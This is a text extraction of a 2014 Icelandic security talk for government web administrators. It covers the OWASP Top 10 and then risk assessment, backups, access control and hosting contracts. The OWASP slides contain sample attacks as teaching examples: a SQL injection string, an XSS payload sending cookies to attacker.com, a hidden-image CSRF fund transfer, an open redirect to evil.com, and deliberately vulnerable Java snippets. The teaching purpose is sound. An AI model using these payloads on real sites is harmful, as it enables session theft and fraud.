Upload File

dagskrÁ - skýrslutæknifélag Íslands“a direct object reference occurs when a developer exposes...

  • Home
  • Documents
  • DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or
71
Fræ ð slufundur fyrir vefstjóra og a ð ra sem koma a ð þ róun vefja. 27. nóvember 2014 Svavar Ingi Hermannsson, CISSP, CISA, CISM UPPL Ý SINGAÖRYGGI OG OPINBERIR VEFIR

Upload: others

Post on 22-Jul-2020

4 views

Category:

Documents


0 download

Report

TRANSCRIPT

Page 1: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

Fræðslufundur fyr i r vefst jóra og aðra sem koma að þ róun vefja. 27. nóvember 2014 Svavar Ingi Hermannsson, CISSP, CISA , CISM

UPPLÝSINGAÖRYGGI OG OPINBERIR VEFIR

Page 2: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Kynning ¡  Almennt tölvuöryggi ¡  Öryggi vefja ¡  Stað lar tengdir upplýsingaöryggi ¡  Áhættumat ¡  Öryggi og flokkun gagna ¡  Stjórnun og rekstrarumhverfi

DAGSKRÁ

Page 3: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

Svavar Ing i Hermannsson hefur sérhæf t s ig í tö lvuör yggi s íðustu 20 ár og hefur gengt ýmsum stör fum tengt forr i tun og ráðgjöf í tö lvuör yggi ( innbrotsprófani r, ve ik le ikagre in ingar, kóðarýni , s t jórnun upplýs ingaör yggis (þar á meðal ISO/IEC 27001 , PCI -DSS og PA -DSS) ) . Svavar hefur kennt v ið Háskóla Ís lands og Háskólann í Reykjav ik , auk þess að hafa hald ið fy r i r lest ra og námskeið bæð i á Ís landi og í út löndum. Svavar var formaður faghóps um ör yggismál h já Ský r s lutæknifé laginu f rá 2007 t i l 2012. Svavar er með ýmsar gráður, meðal annars : C ISSP, CISA , C ISM.

KYNNING

Page 4: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Leynd §  Gögn eiga einungis að vera aðgengileg þeim sem þess þurfa. Vernda ber gögn

eftir viðkvæmnisstigi byggt á áhættumati. ¡  Réttleiki

§  Nauðsynlegt er að geta treyst þeim gögnum sem unnið er með hverju sinni og að þeim hafi ekki verið breytt án leyfis. Vernda ber gögn fyrir óheimilum breytingum og taka þar mið af áhættumati.

¡  Tiltækileiki §  Tryggja þarf að gögn séu aðgengileg þegar þörf er á. Tryggja ber tiltækileika

gagna byggt á niðurstöðu áhættumats. ¡  Rekjanleiki

§  Tryggja þarf að hægt sé að rekja aðgerðasögu (e.Logging history) eins og þörf er á. Byggja ber slíka kröfu á niðurstöðu áhættumats. Dæmi um rekjanleika aðgerða er atvikaskrá (e. Log).

UPPLÝSINGAÖRYGGI – FJÓRAR STOÐIR

Page 5: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  “How Apple and Amazon Security Flaws Led to My Epic Hacking” – Mat Honan (wired.com)

ALMENNT TÖLVUÖRYGGI

Page 6: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Öryggisgráður á íslandi 2013

¡  Fjöldi fyrir tækja 2012 samkvæmt hagstofu var tæpla 63.000

KPMG – Rannsókn á stöðu netöryggismála á Íslandi https://www.owasp.org/images/6/64/OWASP_april_2014.pdf

STAÐAN Á ÍSLANDI

CEH CISA CISSP CISM

15 16 6 4

Page 7: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Dæmi um vefkerfi: §  Heimabankar §  Skattaframtal §  Heilbrigðisgátt §  Vefverslanir

ÖRYGGI VEFJA

Page 8: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Hversu margar tilkynntar vefafskræmingar haldið þ ið að hafi átt sér stað á íslenskum lénum, það sem af er lið ið af 2014 (15.11.2014)? §  330

¡  Hvers konar fyrirtæki verða fyrir því að vera afskræmd?

ÖRYGGI VEFJA

Page 9: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Hvað heldur fólk almennt að afskræming vefsíðna sé? ¡  Hvað vitum við að afskræming vefsíðan sé? ¡  Hvernig er brugð ist við afskræmingum vefsíðna? ¡  Hvernig ætti að bregðast við afskræmingum vefsíðna?

ÖRYGGI VEFJA

Page 10: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Upplýsingaleki §  Skilaboð á vefsíðu

§  Rangt notandanafn §  Rangt lykilorð

§  Villuboð / logg skrár §  Hvað dettur ykkur í hug?

§  Öryggisafrit (kóða skrár, config skrár, .tar.gz, .zip, annað?)

ÖRYGGI VEFJA

Page 11: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  OWASP §  Open Web Application Security Project §  Not-for-profit world wide charitable organization focused on

improving the security of application software. § Mission to make application security more visible, so that people can

make informed decisions. http://www.owasp.org/ http://www.upplysingaoryggi.is/blog/owasp_top_10.html

ÖRYGGI VEFJA

Page 12: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Hvað er OWASP top 10? §  "The goal of the Top 10 project is to raise awareness about

application security by identifying some of the most critical risks facing organizations.“

§  It is a list of the top 10 most critical web application security risks.

¡  Fyrst gefinn út 2003

¡ Margar bækur, tól og stað lar vitna í OWASP top 10

OWASP TOP 10

Page 13: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. §  SQL queries §  LDAP queries §  Xpath §  Program arguments / OS arguments

A1 – INJECTION ATTACKS

Page 14: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Dæmi um kóða með SQL inspýtingarveikleika:

¡  Dæmi um misnotkun á SQL innspýtingarveikleikanum: ¡  http://example.com/app/accountView?id=' or '1'='1

A1 – SQL INJECTION EXAMPLE

String query = "SELECT * FROM accounts WHEREcustID='" + request.getParameter("id") +"'";

Page 15: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  “Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities.”

A2 – BROKEN AUTHENTICATION AND SESSION MANAGEMENT

Page 16: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Are credentials always protected when stored using hashing or encryption? (See A7).

¡  Can credentials be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs)?

¡  Are session IDs exposed in the URL (e.g., URL rewriting)?

A2 – BROKEN AUTHENTICATION AND SESSION MANAGEMENT - QUIZ

Page 17: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Are session IDs vulnerable to session fixation attacks?

¡  Do session IDs timeout and can users log out?

¡  Are session IDs rotated after successful login?

¡  Are passwords, session IDs, and other credentials sent only over TLS connections? (See A9)

A2 – BROKEN AUTHENTICATION AND SESSION MANAGEMENT - QUIZ

Page 18: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Attack scenario 1. §  http://example.com/sale/

saleitems;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii §  Send link to friends with info on the trip you‘re planning.

¡  Attack scenario 2. §  You use someones elses computer e.g. at an Internet cafee and the

application's timeouts aren’t set properly.

¡  Attack scenario 3. §  Insider or external attacker gains access to the system’s password

database.

A3 – BROKEN AUTHENTICATION AND SESSION MANAGEMENT

Page 19: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

A3 – CROSS SITE SCRIPTING (XSS)

Page 20: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Dæmi um kóða með XSS veikleika:

¡  Dæmi um misnotkun á XSS veikleikanum (með því að gefa CC eftir farandi gildi): §  '><script>document.location='http://www.attacker.com/cgi-bin/

cookie.cgi?foo='+document.cookie</script>'.

A3 – CROSS SITE SCRIPTING (XSS)

(String) page += "<input name='creditcard' type='TEXT‘value='" + request.getParameter("CC") + "'>";

Page 21: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  “A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.”

A4 – INSECURE DIRECT OBJECT REFERENCES

Page 22: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Vulnerability example

¡  Attack example §  http://example.com/app/accountInfo?acct=notmyacct

A4 – INSECURE DIRECT OBJECT REFERENCES

String query = "SELECT * FROM accts WHERE account = ?"; PreparedStatementpstmt=connection.prepareStatement(query , … ); pstmt.setString( 1, request.getParameter("acct")); ResultSetresults = pstmt.executeQuery( );

Page 23: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  “Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date, including all code libraries used by the application.”

A5 – SECURITY MISCONFIGURATION

Page 24: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Is everything unnecessary disabled, removed, or not installed (e.g. ports, services, pages, accounts, privileges)?

¡  Are default account passwords changed or disabled?

¡  Is your error handling set up to prevent stack traces and other overly informative error messages from leaking?

A5 – SECURITY MISCONFIGURATION - QUIZ

Page 25: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Scenario #1 §  The app server admin console is automatically installed and not

removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.

A5 – SECURITY MISCONFIGURATION – ATTACK SCENARIOS

Page 26: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Scenario #2 §  Directory listing is not disabled on your server. Attacker discovers she

can simply list directories to find any file. Attacker finds and downloads all your compiled Java classes, which she reverses to get all your custom code. She then finds a serious access control flaw in your application.

¡  Scenario #3 §  App server configuration allows stack traces to be returned to users,

potentially exposing underlying flaws. Attackers love the extra information error messages provide.

A5 – SECURITY MISCONFIGURATION – ATTACK SCENARIOS

Page 27: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡ Many web applications do not properly protect sensitive data, such as credit cards, SSNs, and authentication credentials, with appropriate encryption or hashing. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes.

¡  “Applications frequently fail to authenticate, encrypt, and protect the confidentiality and integrity of sensitive network traffic. When they do, they sometimes support weak algorithms, use expired or invalid certificates, or do not use them correctly.”

A6 – SENSITIVE DATA EXPOSURE

Page 28: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Sensitive data is encrypted everywhere it is stored long term, particularly in backups of this data?

¡  Only authorized users can access decrypted copies of the data (i.e., access control –See A4 and A7)?

¡  A strong standard encryption algorithm is used.

¡  A strong key is generated, protected from unauthorized access, and key change is planned for.

A6 – SENSITIVE DATA EXPOSURE- QUIZ

Page 29: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Is SSL used to protect all authentication related traffic?

¡  SSL is used for all resources on all private pages and services. This protects all data and session tokens that are exchanged. Mixed SSL on a page should be avoided since it causes user warnings in the browser, and may expose the user’s session ID.

¡  Only strong algorithms are supported.

A6 – SENSITIVE DATA EXPOSURE

Page 30: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  All session cookies have their ‘secure’ flag set so the browser never transmits them in the clear.

¡  The server certificate is legitimate and properly configured for that server. This includes being issued by an authorized issuer, not expired, has not been revoked, and it matches all domains the site uses.

A6 – SENSITIVE DATA EXPOSURE

Page 31: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Scenario #1 §  A backup tape is made of encrypted health records, but the

encryption key is on the same backup. The tape never arrives at the backup center.

¡  Scenario #2 §  The password database uses unsalted hashes to store everyone’s

passwords. A file upload flaw allows an attacker to retrieve the password file. All the unsalted hashes can be brute forced in 4 weeks, while properly salted hashes would have taken over 3000 years.

A6 – SENSITIVE DATA EXPOSURE

Page 32: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Scenario #3: §  “A site simply doesn’t use SSL for all pages that require

authentication. Attacker simply monitors network traffic (like an open wireless or their neighborhood cable modem network), and observes an authenticated victim’s session cookie. Attacker then replays this cookie and takes over the user’s session.”

A6 – SENSITIVE DATA EXPOSURE

Page 33: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Scenario #4: §  A site has improperly configured SSL certificate which causes

browser warnings for its users. Users have to accept such warnings and continue, in order to use the site. This causes users to get accustomed to such warnings. Phishing attack against the site’s customers lures them to a lookalike site which doesn’t have a valid certificate, which generates similar browser warnings. Since victims are accustomed to such warnings, they proceed on and use the phishing site, giving away passwords or other private data.

A6 – SENSITIVE DATA EXPOSURE

Page 34: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Scenario #5: §  A site simply uses standard ODBC/JDBC for the database connection,

not realizing all traffic is in the clear.

A6 – SENSITIVE DATA EXPOSURE

Page 35: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡ Many web applications check URL access rights before rendering protected links and buttons. However, applications need to perform similar access control checks each time these pages are accessed, or attackers will be able to forge URLs to access these hidden pages anyway.

A7 – MISSING FUNCTION LEVEL ACCESS CONTROL

Page 36: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Is authentication required to access that page?

¡  Is it supposed to be accessible to ANY authenticated user? If not, is an authorization check made to ensure the user has permission to access that page?

A7 – MISSING FUNCTION LEVEL ACCESS CONTROL

Page 37: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Attack scenarios §  http://example.com/app/getappInfo §  http://example.com/app/admin_getappInfo

A7 – MISSING FUNCTION LEVEL ACCESS CONTROL

Page 38: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.

A8 – CROSS-SITE REQUEST FORGERY

Page 39: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Normal use of a service vulnerable to a CSRF §  http://example.com/app/transferFunds?

amount=1500&destinationAccount=4673243243

¡  Attack scenario §  <imgsrc="http://example.com/app/transferFunds?

amount=1500&destinationAccount=attackersAcct#“width="0" height="0" />

A8 – CROSS-SITE REQUEST FORGERY

Page 40: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  “When software solutions are being used, they me be outdated with known vulnerabilities. Main software solutions may also be up to date, but some plugins or components may be out dated and/or contain known security vulnerabilities.”

A9 – USING KNOWN VULNERABLE COMPONENTS

Page 41: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Do you have a process for keeping all your software up to date? This includes the OS, Web/App Server, DBMS, applications, and all code libraries?

A9 – USING KNOWN VULNERABLE COMPONENTS

Page 42: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  “Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.”

A10 – UNVALIDATEDREDIRECTS AND FORWARDS

Page 43: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Scenario #1 §  The application has a page called “redirect.jsp” which takes a single

parameter named “url”. The attacker crafts a malicious URL that redirects users to a malicious site that performs phishing and installs malware. §  http://www.example.com/redirect.jsp?url=evil.com

A10 – UNVALIDATED REDIRECTS AND FORWARDS - ATTACK SCENARIOS

Page 44: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Scenario #2 §  The application uses forward to route requests between different

parts of the site. To facilitate this, some pages use a parameter to indicate where the user should be sent if a transaction is successful. In this case, the attacker crafts a URL that will pass the application’s access control check and then forward the attacker to an administrative function that she would not normally be able to access. §  http://www.example.com/boring.jsp?fwd=admin.jsp

A10 – UNVALIDATED REDIRECTS AND FORWARDS - ATTACK SCENARIOS

Page 45: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Stjórnunarlegir stað lar §  ISO/IEC 27001 Stjórnkerfi upplýsingaöryggis. §  ISO 23001 – Áætlun um samfelldan rekstur §  ISO 31000 – Áhættumat

¡  Tæknilegir stað lar §  OWASP top 10 §  CWE/SANS TOP 25 Most Dangerous Software Errors §  PCI DSS

STAÐLAR TENGDIR UPPLÝSINGAÖRYGGI

Page 46: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  ISO 31000 ¡  Við framkvæmd áhættumats þarf að kortleggja eftir farandi:

§  Eignir §  Veikleikar og ógnir §  Líkur

¡  Áhættumeðferðaráætlun §  Ráðstafanir til að takmarka og draga úr áhættu. § Markmið með ráðstöfunum. §  Ábyrgðaraðili ráðstafana.

§  (kostnaður vs. áhrif)

ÁHÆTTUMAT (1/2)

Page 47: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Segir til um §  Öryggi og flokkun gagna §  Val á vefumsjónarkerfi. §  Kröfur til hýsingaraðila. §  Kröfur í samningum við þjónustuaðila. §  Dulkóðun og öryggismál: Aðgangsstjórnun, dulkóðun gagna,

notendanöfn og lykilorð og stjórnun aðgangs. §  Öryggisafritun. §  Öryggisprófanir á veflausnum.

ÁHÆTTUMAT (2/2)

Page 48: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Yfirsýn §  Hvaða gögn eru vistuð? §  Hvar eru gögnin vistuð? §  Hvaða gögnum er skiptst á (inntak/úttak)? §  Hvaða gögn eru afrituð? §  Ytri kröfur? (lagalegar?/samningsbundnar?)

¡  Dregur úr flækjustigi við áhættustýringu §  Aðgangsstýringar §  Viðlagaáætlun

YFIRSÝN OG SKILNINGUR (1/2)

Page 49: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Dæmi um flokkun gagna §  Almennar upplýsingar

§  Þessi flokkur nær til allra gagna sem hugsuð eru til almennrar útgáfu og eiga að vera aðgengileg almenningi.

§  Innanhússupplýsingar §  Þessi flokkur ætti að ná til gagna sem eru ekki hugsuð til almennrar

útgáfu og eru einungis til afnota innan viðkomandi ráðuneytis eða stofnunar.

§  Viðkvæmar upplýsingar §  Þessi flokkur nær til viðkvæmra gagna sem ber að vernda, t.d. með

dulkóðun. Dæmi um viðkvæmar upplýsingar eru lykilorð, kortaupplýsingar, heilsufarsupplýsingar, launaupplýsingar o.s.frv.

YFIRSÝN OG SKILNINGUR (2/2)

Page 50: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Hafa þeir sem hanna og forrita vefumsjónarkerfið hlotið nægilega þ jálfun í tengslum við öryggi veflausna?

¡  Þekkja þeir helstu áhættuþætti er snúa að veflausnum (OWASP top 10 / SANS top 25)?

¡  Hafa þeir nægilega þekkingu til þess að hanna viðeigandi stýringar í viðkomandi kerfi?

¡  Er boð ið upp á dulkóðun gagna í gagnagrunni (þegar þess er þörf)?

VAL Á VEFUMSJÓNARKERFUM (1/3)

Page 51: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Er stöðug þróun á vefumsjónarkerfinu? ¡  Verða viðskiptavinir látnir vita ef öryggisgallar finnast í

vefumsjónarkerfinu? Hefur það ferli verið skjalað? ¡  Er gert ráð fyrir því að öryggisuppfærslur verð i viðskiptavinum

að kostnaðarlausu? ¡  Hafa verið framkvæmdar öryggisúttektir á viðkomandi

vefumsjónarkerfi? §  Er hægt að fá afrit af skýrslu vegna þessa?

VAL Á VEFUMSJÓNARKERFUM (2/3)

Page 52: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Hönnun vefkerfa §  Hefur hugbúnaðarþróunarferli verið skilgreint? §  Hefur regluverk við forritun verið skilgreint? §  Hafa öryggiskröfur verið skilgreindar? §  Breytingastjórnun? §  Útgáfustjórnun með öryggisúttektum

§  Kóðarýni? §  Öryggisúttekt? §  Prófanir á grunn virkni?

§  Hafa forritarar hlotið þjálfun í öryggi hugbúnaðarþróunar?

VAL Á VEFUMSJÓNARKERFUM (3/3)

Page 53: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Hefur hýsingarað i l inn innleitt stjórnkerfi upplýsingaöryggis? (ISO/IEC 27001)

¡  Hefur viðkomandi hlotið faglega vottun á stjórnkerfi upplýsingaöryggis? §  Ef svo er, hvert er umfang vottunarinnar? §  Þó svo að hýsingaraðili sé vottaður þýðir ekki að þið séuð vottuð.

¡  Er virk neyðar- og við lagaáætlun til staðar?

VAL Á HÝSINGAR- OG ÞJÓNUSTUAÐILUM (1/2)

Page 54: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Vöktun og frávikaskráning §  Reglulegir stöðufundir til að meta framvindu veittrar þjónustu og

yfirfara frávikaskráningu.

¡  Eru stöðugar öryggisuppfærslur á skilgreindum viðhaldstímum?

VAL Á HÝSINGAR- OG ÞJÓNUSTUAÐILUM (2/2)

Page 55: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Af hverju ætti að taka öryggisafrit? Hvað getur gerst? (Áhættumat - ISO 31000)

¡  Hvaða gögn þarf að afrita? ¡  Hvaða gögn þarf ekki að afrita? ¡  Hversu oft þarf að afrita gögn? ¡  Hversu lengi þarf að geyma afrituð gögn? ¡  Hefur ábyrgðarað i l i gagna verið skilgreindur?

ÖRYGGISAFRITUN (1/3)

Page 56: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Eru kröfur um öryggisafritunartöku skjalaðar? ¡  Er ferli við öryggisafritunartöku skjalað? ¡  Er verið að vakta öryggisafritunartökuna? ¡ Mikilvægt er að staðfesta öryggisafritunar töku og prófa að

endurheimta frá öryggisafriti (að lágmarki einu sinni á ári). Slíkar prófanir ætti að skjala.

¡  Kröfum um öryggisafritunarkröfu þarf að vera komið á framfæri með skriflegum hætti (samningur).

ÖRYGGISAFRITUN (2/3)

Page 57: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Er passað upp á að frumgögn séu ekki geymd á sama stað /svæð i og öryggisafrit?

¡  Hvernig er aðgangi að öryggisafritum stýrt? Hverjir hafa aðgang?

¡  Hvernig skal stað ið að förgun gagna og afritunarmið la?

ÖRYGGISAFRITUN (3/3)

Page 58: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Er til staðar formlegt ferli við stjórnun aðgangs? §  Hver getur óskað eftir aðgangi? §  Breytt aðgangsheimildum? §  Lokað fyrir aðgang?

¡  Er ferlið rekjanlegt? ¡  Er aðgangur rýndur reglulega?

STJÓRNUN AÐGANGS (1/2)

Page 59: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Notendanöfn og lykilorð §  Notast ætti við auðkenningarþjónustu hjá ísland.is þar sem því verður

komið við. §  Að öðrum kosti ætti að gera kröfu til lykilorða um að lágmarki þrjú af

eftirfarandi fjórum atriðum séu uppfyllt: hástafir, lágstafir, tölur, sértákn.

§ Mikilvægt að geyma lykilorð ekki á textaformi (OWASP top 10).

¡  Notast ætti við hópa við aðgangsstýringar, þar sem það er í boð i .

STJÓRNUN AÐGANGS (2/2)

Page 60: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Ávallt með ný justu öryggisuppfærslunum (póstlistar) §  Vefmiðlarar §  Gagnagrunnskerfi §  Stýrikerfi §  Kóðasöfn (e. Library)

¡  Hvernig skal stað ið að öryggisuppfærslum? (innan hvaða tímaramma? Á hvaða tíma sólarhrings?)

¡  Hefur verið lokað fyrir það sem ekki er þörf á. ¡  Er búið að loka fyrir eða breyta sjálfgefnum notendum/

lykilorðum.

ÖRYGGI GRUNNKERFA (1/2)

Page 61: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Eru eldveggir til staðar? ¡  Er innbrotsvöktunarkerfi til staðar?

§  Er verið að vakta innbrotsvöktunarkerfið?

ÖRYGGI GRUNNKERFA (2/2)

Page 62: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Ekki gera ráð fyrir því að eitthvað sé innifalið í samningum. ¡  Ef það kemur ekki fram í samningum eða viðaukum, þá er

ekki hægt að treysta því. ¡  Hvað er innifalið í þ jónustusamning?

§  Uppitími? §  Þjónustustig? §  Viðbragðstími? §  Aðgengi að tæknimönnum? §  Fyrirkomulag öryggisafritunartöku?

SAMNINGAR (1/3)

Page 63: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Hvernig er viðbragðstími ef öryggisgallar finnast? ¡  Eru öryggisuppfærslur viðskiptavinum að kostnaðarlausu? ¡  Hverjir munu hafa aðgang að gögnum? (starfsmenn þ jónustuað i la? Þrið j i að i l i?)

¡  Skilgreina formlegt aðgangsstýringarferli þar sem ábyrgðarað i lar verkkaupa eru skilgreindir. §  Tilkynna ætti aðgangsbreytingar þjónustuaðila og annara til

ábyrgðaraðila verkkaupa.

SAMNINGAR (2/3)

Page 64: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  Formleg breytingastjórnun + tilkynningar um fyrirhugaðar breytingar.

¡  Tryggja þarf viðeigandi eftirlitsferli

SAMNINGAR (3/3)

Page 65: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

